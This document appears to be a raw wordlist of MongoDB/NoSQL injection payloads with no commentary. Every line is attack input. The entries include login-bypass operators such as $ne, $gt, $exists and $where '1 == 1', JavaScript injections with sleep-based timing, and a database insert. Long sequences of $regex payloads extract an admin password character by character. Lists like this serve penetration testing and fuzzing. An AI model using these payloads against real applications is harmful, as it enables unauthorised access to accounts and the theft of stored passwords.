";return(true);var xyz='a
$or: [ {}, { ‘a’: ‘a’, password: ‘’ }], $comment: ‘successful MongoDB injection’ }
$where: '1 == 1'
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
' || 'a'=='a
' } ], $comment:'successful MongoDB injection'
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
', $or: [ {}, { 'a':'a
', $where: '1 == 1'
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
';return 'a'=='a' && ''=='
';sleep(5000);
';sleep(5000);'
';sleep(5000);+'
, $where: '1 == 1'
0;return true
1, $where: '1 == 1'
admin' && this.password && this.password.match(/.*/)%00
admin' && this.password && this.password.match(/^a.*$/)%00
admin' && this.password && this.password.match(/^b.*$/)%00
admin' && this.password && this.password.match(/^c.*$/)%00
admin' && this.password && this.password.match(/^duvj.*$/)%00
admin' && this.password && this.password.match(/^duvj78i3u$/)%00
admin' && this.password%00
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
tolkien’, $or: [ {}, { ‘a’:’a&password=’ } ],$comment:’successful MongoDB injection'
true, $where: '1 == 1'
username[$eq]=admin&password[$ne]=1
username[$exists]=true&password[$exists]=true
username[$ne]=1$password[$ne]=1
username[$ne]=admin&pass[$gt]=s
username[$ne]=admin&pass[$lt]=s
username[$ne]=admin&password[$ne]=admin
username[$ne]=admin&password[$regex]=.{1}
username[$ne]=admin&password[$regex]=.{2}
username[$ne]=admin&password[$regex]=.{3}
username[$ne]=admin&password[$regex]=.{4}
username[$ne]=admin&password[$regex]=.{5}
username[$ne]=admin&password[$regex]=.{6}
username[$ne]=admin&password[$regex]=.{7}
username[$ne]=admin&password[$regex]=.{8}
username[$ne]=admin&password[$regex]=.{9}
username[$ne]=admin&password[$regex]=.{10}
username[$ne]=admin&password[$regex]=.{11}
username[$ne]=admin&password[$regex]=.{12}
username[$ne]=admin&password[$regex]=.{13}
username[$ne]=admin&password[$regex]=.{14}
username[$ne]=admin&password[$regex]=.{15}
username[$ne]=admin&password[$regex]=a.{2}
username[$ne]=admin&password[$regex]=b.{2}
username[$ne]=admin&password[$regex]=m.*
username[$ne]=admin&password[$regex]=m.{2}
username[$ne]=admin&password[$regex]=md.*
username[$ne]=admin&password[$regex]=md.{1}
username[$ne]=admin&password[$regex]=mdp
username[$ne]=admin&password[$regex]=\bA
username[$ne]=admin&password[$regex]=\bB
username[$ne]=admin&password[$regex]=\bC
username[$ne]=admin&password[$regex]=\bD
username[$ne]=admin&password[$regex]=\bE
username[$ne]=admin&password[$regex]=\bF
username[$ne]=admin&password[$regex]=\bG
username[$ne]=admin&password[$regex]=\bH
username[$ne]=admin&password[$regex]=\bI
username[$ne]=admin&password[$regex]=\bJ
username[$ne]=admin&password[$regex]=\bK
username[$ne]=admin&password[$regex]=\bL
username[$ne]=admin&password[$regex]=\bM
username[$ne]=admin&password[$regex]=\bN
username[$ne]=admin&password[$regex]=\bO
username[$ne]=admin&password[$regex]=\bP
username[$ne]=admin&password[$regex]=\bQ
username[$ne]=admin&password[$regex]=\bR
username[$ne]=admin&password[$regex]=\bS
username[$ne]=admin&password[$regex]=\bT
username[$ne]=admin&password[$regex]=\bU
username[$ne]=admin&password[$regex]=\bV
username[$ne]=admin&password[$regex]=\bW
username[$ne]=admin&password[$regex]=\bX
username[$ne]=admin&password[$regex]=\bY
username[$ne]=admin&password[$regex]=\bZ
username[$ne]=admin&password[$regex]=\b0
username[$ne]=admin&password[$regex]=\b1
username[$ne]=admin&password[$regex]=\b2
username[$ne]=admin&password[$regex]=\b3
username[$ne]=admin&password[$regex]=\b4
username[$ne]=admin&password[$regex]=\b5
username[$ne]=admin&password[$regex]=\b6
username[$ne]=admin&password[$regex]=\b7
username[$ne]=admin&password[$regex]=\b8
username[$ne]=admin&password[$regex]=\b9
username[$ne]=admin&password[$regex]=\ba
username[$ne]=admin&password[$regex]=\bb
username[$ne]=admin&password[$regex]=\bc
username[$ne]=admin&password[$regex]=\bd
username[$ne]=admin&password[$regex]=\be
username[$ne]=admin&password[$regex]=\bf
username[$ne]=admin&password[$regex]=\bg
username[$ne]=admin&password[$regex]=\bh
username[$ne]=admin&password[$regex]=\bi
username[$ne]=admin&password[$regex]=\bj
username[$ne]=admin&password[$regex]=\bk
username[$ne]=admin&password[$regex]=\bl
username[$ne]=admin&password[$regex]=\bm
username[$ne]=admin&password[$regex]=\bn
username[$ne]=admin&password[$regex]=\bo
username[$ne]=admin&password[$regex]=\bp
username[$ne]=admin&password[$regex]=\bq
username[$ne]=admin&password[$regex]=\br
username[$ne]=admin&password[$regex]=\bs
username[$ne]=admin&password[$regex]=\bt
username[$ne]=admin&password[$regex]=\bu
username[$ne]=admin&password[$regex]=\bv
username[$ne]=admin&password[$regex]=\bw
username[$ne]=admin&password[$regex]=\bx
username[$ne]=admin&password[$regex]=\by
username[$ne]=admin&password[$regex]=\bz
username[$eq]=admin&password[$regex]=\bA
username[$eq]=admin&password[$regex]=\bB
username[$eq]=admin&password[$regex]=\bC
username[$eq]=admin&password[$regex]=\bD
username[$eq]=admin&password[$regex]=\bE
username[$eq]=admin&password[$regex]=\bF
username[$eq]=admin&password[$regex]=\bG
username[$eq]=admin&password[$regex]=\bH
username[$eq]=admin&password[$regex]=\bI
username[$eq]=admin&password[$regex]=\bJ
username[$eq]=admin&password[$regex]=\bK
username[$eq]=admin&password[$regex]=\bL
username[$eq]=admin&password[$regex]=\bM
username[$eq]=admin&password[$regex]=\bN
username[$eq]=admin&password[$regex]=\bO
username[$eq]=admin&password[$regex]=\bP
username[$eq]=admin&password[$regex]=\bQ
username[$eq]=admin&password[$regex]=\bR
username[$eq]=admin&password[$regex]=\bS
username[$eq]=admin&password[$regex]=\bT
username[$eq]=admin&password[$regex]=\bU
username[$eq]=admin&password[$regex]=\bV
username[$eq]=admin&password[$regex]=\bW
username[$eq]=admin&password[$regex]=\bX
username[$eq]=admin&password[$regex]=\bY
username[$eq]=admin&password[$regex]=\bZ
username[$eq]=admin&password[$regex]=\b0
username[$eq]=admin&password[$regex]=\b1
username[$eq]=admin&password[$regex]=\b2
username[$eq]=admin&password[$regex]=\b3
username[$eq]=admin&password[$regex]=\b4
username[$eq]=admin&password[$regex]=\b5
username[$eq]=admin&password[$regex]=\b6
username[$eq]=admin&password[$regex]=\b7
username[$eq]=admin&password[$regex]=\b8
username[$eq]=admin&password[$regex]=\b9
username[$eq]=admin&password[$regex]=\ba
username[$eq]=admin&password[$regex]=\bb
username[$eq]=admin&password[$regex]=\bc
username[$eq]=admin&password[$regex]=\bd
username[$eq]=admin&password[$regex]=\be
username[$eq]=admin&password[$regex]=\bf
username[$eq]=admin&password[$regex]=\bg
username[$eq]=admin&password[$regex]=\bh
username[$eq]=admin&password[$regex]=\bi
username[$eq]=admin&password[$regex]=\bj
username[$eq]=admin&password[$regex]=\bk
username[$eq]=admin&password[$regex]=\bl
username[$eq]=admin&password[$regex]=\bm
username[$eq]=admin&password[$regex]=\bn
username[$eq]=admin&password[$regex]=\bo
username[$eq]=admin&password[$regex]=\bp
username[$eq]=admin&password[$regex]=\bq
username[$eq]=admin&password[$regex]=\br
username[$eq]=admin&password[$regex]=\bs
username[$eq]=admin&password[$regex]=\bt
username[$eq]=admin&password[$regex]=\bu
username[$eq]=admin&password[$regex]=\bv
username[$eq]=admin&password[$regex]=\bw
username[$eq]=admin&password[$regex]=\bx
username[$eq]=admin&password[$regex]=\by
username[$eq]=admin&password[$regex]=\bz
username[$ne]=admin&password[$regex]=^A
username[$ne]=admin&password[$regex]=^B
username[$ne]=admin&password[$regex]=^C
username[$ne]=admin&password[$regex]=^D
username[$ne]=admin&password[$regex]=^E
username[$ne]=admin&password[$regex]=^F
username[$ne]=admin&password[$regex]=^G
username[$ne]=admin&password[$regex]=^H
username[$ne]=admin&password[$regex]=^I
username[$ne]=admin&password[$regex]=^J
username[$ne]=admin&password[$regex]=^K
username[$ne]=admin&password[$regex]=^L
username[$ne]=admin&password[$regex]=^M
username[$ne]=admin&password[$regex]=^N
username[$ne]=admin&password[$regex]=^O
username[$ne]=admin&password[$regex]=^P
username[$ne]=admin&password[$regex]=^Q
username[$ne]=admin&password[$regex]=^R
username[$ne]=admin&password[$regex]=^S
username[$ne]=admin&password[$regex]=^T
username[$ne]=admin&password[$regex]=^U
username[$ne]=admin&password[$regex]=^V
username[$ne]=admin&password[$regex]=^W
username[$ne]=admin&password[$regex]=^X
username[$ne]=admin&password[$regex]=^Y
username[$ne]=admin&password[$regex]=^Z
username[$ne]=admin&password[$regex]=^0
username[$ne]=admin&password[$regex]=^1
username[$ne]=admin&password[$regex]=^2
username[$ne]=admin&password[$regex]=^3
username[$ne]=admin&password[$regex]=^4
username[$ne]=admin&password[$regex]=^5
username[$ne]=admin&password[$regex]=^6
username[$ne]=admin&password[$regex]=^7
username[$ne]=admin&password[$regex]=^8
username[$ne]=admin&password[$regex]=^9
username[$ne]=admin&password[$regex]=^a
username[$ne]=admin&password[$regex]=^b
username[$ne]=admin&password[$regex]=^c
username[$ne]=admin&password[$regex]=^d
username[$ne]=admin&password[$regex]=^e
username[$ne]=admin&password[$regex]=^f
username[$ne]=admin&password[$regex]=^g
username[$ne]=admin&password[$regex]=^h
username[$ne]=admin&password[$regex]=^i
username[$ne]=admin&password[$regex]=^j
username[$ne]=admin&password[$regex]=^k
username[$ne]=admin&password[$regex]=^l
username[$ne]=admin&password[$regex]=^m
username[$ne]=admin&password[$regex]=^n
username[$ne]=admin&password[$regex]=^o
username[$ne]=admin&password[$regex]=^p
username[$ne]=admin&password[$regex]=^q
username[$ne]=admin&password[$regex]=^r
username[$ne]=admin&password[$regex]=^s
username[$ne]=admin&password[$regex]=^t
username[$ne]=admin&password[$regex]=^u
username[$ne]=admin&password[$regex]=^v
username[$ne]=admin&password[$regex]=^w
username[$ne]=admin&password[$regex]=^x
username[$ne]=admin&password[$regex]=^y
username[$ne]=admin&password[$regex]=^z
username[$eq]=admin&password[$regex]=^A
username[$eq]=admin&password[$regex]=^B
username[$eq]=admin&password[$regex]=^C
username[$eq]=admin&password[$regex]=^D
username[$eq]=admin&password[$regex]=^E
username[$eq]=admin&password[$regex]=^F
username[$eq]=admin&password[$regex]=^G
username[$eq]=admin&password[$regex]=^H
username[$eq]=admin&password[$regex]=^I
username[$eq]=admin&password[$regex]=^J
username[$eq]=admin&password[$regex]=^K
username[$eq]=admin&password[$regex]=^L
username[$eq]=admin&password[$regex]=^M
username[$eq]=admin&password[$regex]=^N
username[$eq]=admin&password[$regex]=^O
username[$eq]=admin&password[$regex]=^P
username[$eq]=admin&password[$regex]=^Q
username[$eq]=admin&password[$regex]=^R
username[$eq]=admin&password[$regex]=^S
username[$eq]=admin&password[$regex]=^T
username[$eq]=admin&password[$regex]=^U
username[$eq]=admin&password[$regex]=^V
username[$eq]=admin&password[$regex]=^W
username[$eq]=admin&password[$regex]=^X
username[$eq]=admin&password[$regex]=^Y
username[$eq]=admin&password[$regex]=^Z
username[$eq]=admin&password[$regex]=^0
username[$eq]=admin&password[$regex]=^1
username[$eq]=admin&password[$regex]=^2
username[$eq]=admin&password[$regex]=^3
username[$eq]=admin&password[$regex]=^4
username[$eq]=admin&password[$regex]=^5
username[$eq]=admin&password[$regex]=^6
username[$eq]=admin&password[$regex]=^7
username[$eq]=admin&password[$regex]=^8
username[$eq]=admin&password[$regex]=^9
username[$eq]=admin&password[$regex]=^a
username[$eq]=admin&password[$regex]=^b
username[$eq]=admin&password[$regex]=^c
username[$eq]=admin&password[$regex]=^d
username[$eq]=admin&password[$regex]=^e
username[$eq]=admin&password[$regex]=^f
username[$eq]=admin&password[$regex]=^g
username[$eq]=admin&password[$regex]=^h
username[$eq]=admin&password[$regex]=^i
username[$eq]=admin&password[$regex]=^j
username[$eq]=admin&password[$regex]=^k
username[$eq]=admin&password[$regex]=^l
username[$eq]=admin&password[$regex]=^m
username[$eq]=admin&password[$regex]=^n
username[$eq]=admin&password[$regex]=^o
username[$eq]=admin&password[$regex]=^p
username[$eq]=admin&password[$regex]=^q
username[$eq]=admin&password[$regex]=^r
username[$eq]=admin&password[$regex]=^s
username[$eq]=admin&password[$regex]=^t
username[$eq]=admin&password[$regex]=^u
username[$eq]=admin&password[$regex]=^v
username[$eq]=admin&password[$regex]=^w
username[$eq]=admin&password[$regex]=^x
username[$eq]=admin&password[$regex]=^y
username[$eq]=admin&password[$regex]=^z
username[$nin][admin]=admin&username[$nin][test]=test&pass[$ne]=7
username[$regex]=.*&password[$regex]=.*
username[$regex]=.{25}&pass[$ne]=1
username[$regex]=^adm$password[$ne]=1
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }
|| 1==1[$ne]=1
